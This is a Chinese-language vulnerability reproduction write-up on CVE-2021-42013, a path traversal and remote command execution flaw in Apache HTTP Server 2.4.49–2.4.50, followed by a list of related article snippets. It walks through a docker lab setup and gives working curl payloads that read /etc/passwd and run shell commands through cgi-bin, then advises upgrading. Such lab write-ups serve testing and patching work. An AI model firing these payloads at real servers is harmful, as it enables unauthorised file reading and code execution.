CVE-2021-42013:Apache HTTP Server目录遍历漏洞
前言
漏洞原理
该漏洞是由于在Apache HTTP Server 2.4.50版本中对CVE-2021-41773修复不够完善,攻击者可利用该漏洞绕过修复补丁,并利用目录穿越攻击访问服务器中一些文件,进而造成敏感信息泄露。若httpd中开启CGI功能,攻击者可以构造恶意请求,造成远程代码执行。
影响版本
Apache HTTP Server 2.4.50
Apache HTTP Server 2.4.49
漏洞信息
漏洞名称 | 路径穿越与命令执行漏洞 |
---|---|
漏洞编号 | CVE-2021-42013 |
危害等级 | 超危 |
CVSS评分 | 9.8 |
漏洞类型 | 路径漏洞 |
查询地址:http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202110-413
环境搭建
利用docker搭建靶场环境
docker pull vulfocus/apache-cve_2021_42013:latest #拉取靶场
docker images #查看镜像
docker run -d -P vulfocus/apache-cve_2021_42013 #启动镜像
docker ps #查看映射的端口
从上图得到ip地址可以在浏览器访问http://ip:49153,看到it’s work,就代表环境搭建成功
漏洞利用
在kali上执行EXP
curl -v --path-as-is http://ip:port/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
在服务器上启用 mods cgi 或 cgid 后,此路径遍历漏洞将允许任意命令执行:
curl -v --data “echo;id” ‘http://ip:port/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh’
或者
curl -s --path-as-is -d ‘echo Content-Type: text/plain; echo; whoami’ “http://ip:port//cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh”
修复方法
升级到Apache HTTP Server安全版本。
CVE-2021-42013:Apache HTTP Server目录遍历漏洞相关推荐
- apache目录遍历漏洞利用_Apache漏洞—多后缀名解析、目录遍历和(CVE-2017-15715)
文章目录 一.Apache httpd 多后缀解析漏洞 漏洞原理 漏洞复现 漏洞修复 二.Apache httpd 换行解析漏洞(CVE-2017-15715) 漏洞原理 漏洞复现 漏洞修复 三.Ap ...
- nginx配置错误而导致目录遍历漏洞
漏洞版本:nginx(Tested at 1.1.10) 漏洞描述:nginx是一款高性能的web服务器,使用非常广泛,其不仅经常被用作反向代理,也是一个 IMAP/POP3/SMTP 代理服务器. ...
- 目录遍历漏洞:入侵检测php程序中的目录遍历漏洞,目录浏览(目录遍历)漏洞
目录浏览(目录遍历)漏洞 来源:信管网 2019年08月26日 [所有评论] 目录浏览漏洞属于目录遍历漏洞的一种 目录浏览(目录遍历)漏洞 目录浏览漏洞是由于网站存在配置缺陷,导致网站目录可以被任意浏 ...
- Kali学习笔记31:目录遍历漏洞、文件包含漏洞
文章的格式也许不是很好看,也没有什么合理的顺序 完全是想到什么写一些什么,但各个方面都涵盖到了 能耐下心看的朋友欢迎一起学习,大牛和杠精们请绕道 目录遍历漏洞: 应用程序如果有操作文件的功能,限制不严 ...
- HttpClient使用之下载远程服务器中的文件(注意目录遍历漏洞)
参考文献: http://bbs.csdn.net/topics/390952011 http://blog.csdn.net/ljj_9/article/details/53306468 1.下载地 ...
- linux遍历目录漏洞,Mutiny 多个目录遍历漏洞(CVE-2013-0136)
发布日期:2013-05-15 更新日期:2013-06-02 受影响系统: Mutiny Mutiny 5 描述: ----------------------------------------- ...
- linux bootstrap强制结束,Cisco UCCX bootstrap服务目录遍历漏洞
发布日期:2010-06-10 更新日期:2010-06-12 受影响系统: Cisco CRS 7.x Cisco CRS 6.x Cisco CRS 5.x Cisco Unified IP IV ...
- niagara在linux系统上的安装,TRIDIUM NiagaraAX目录遍历漏洞
发布日期:2013-02-14 更新日期:2013-03-01 受影响系统: TriDComm NiagaraAX 3.7 TriDComm NiagaraAX 3.6 TriDComm Niagar ...
- ewebeditor漏洞之目录遍历漏洞
这里大概说一下!目录遍历漏洞基本存在于ewebeditor/admin_uploadfile.asp 高版本的是ewebeditor/admin/upload.asp 文件!这个文件有的不需要登陆验证 ...
最新文章
- (转)分布式文件存储FastDFS(五)FastDFS常用命令总结
- UVa1467 Installations(贪心)
- es6 函数解构的用途
- Spring什么是复杂对象
- .Net 如何模拟会话级别的信号量,对http接口调用频率进行限制(有demo)
- ssl提高组国庆模拟赛【2018.10.5】
- 写作工具_4种加快数据科学写作速度的工具
- 微软若“无故”解雇暴雪 CEO,将付 1500 万美元“分手费”
- bookStore项目总结
- python怎么计算圆上任意两点的距离_圆周上两点距离-python
- matlab遗传算法gaot工具箱安装
- 高等数学(下)知识点总结
- Xshell的安装及使用超详细教程
- android Intent调用地图应用客户端
- AI:人工智能领域之国内外人工智能产业应用图谱应用层/基础层详解—AI八大应用领域之医疗/家居/驾驶/零售/城市/教育/金融/交通、(AI三大基础(算法【计算机视觉/自然语言处理/机器学习、科研院所/
- windows c++ 获取本地ip地址
- a href标签下载文件遇到下载失败 打开文件的问题
- 木马冰河之原理篇(深入浅出看木马)
- 电脑上有哪些好用的视频剪辑软件
- LOESS 局部加权回归介绍
热门文章
- 哈工大计算机网络Mooc 第八章笔记(网络层(中))
- dubbo消费者调用报错Unsupported protocol rest in notified url
- 一年级下册计算机教学计划,新人教版一年级数学下册教学计划
- 蓝色巨人IBM(International Business Machines)
- 圆满收官!OFweek 2019(第三届)物联网产业大会成功举办
- unity中VideoPlayer播放视频,使用Shader除去黑底且无黑边
- 服务器主板显示ba,为什么我的设计器不能显示,但是可以调通,主板信息读出发生错误...
- unity屏幕适配以及坐标点适配
- SpaceShooter打飞机教程笔记(一)
- java 打印星号_JAVA打印星号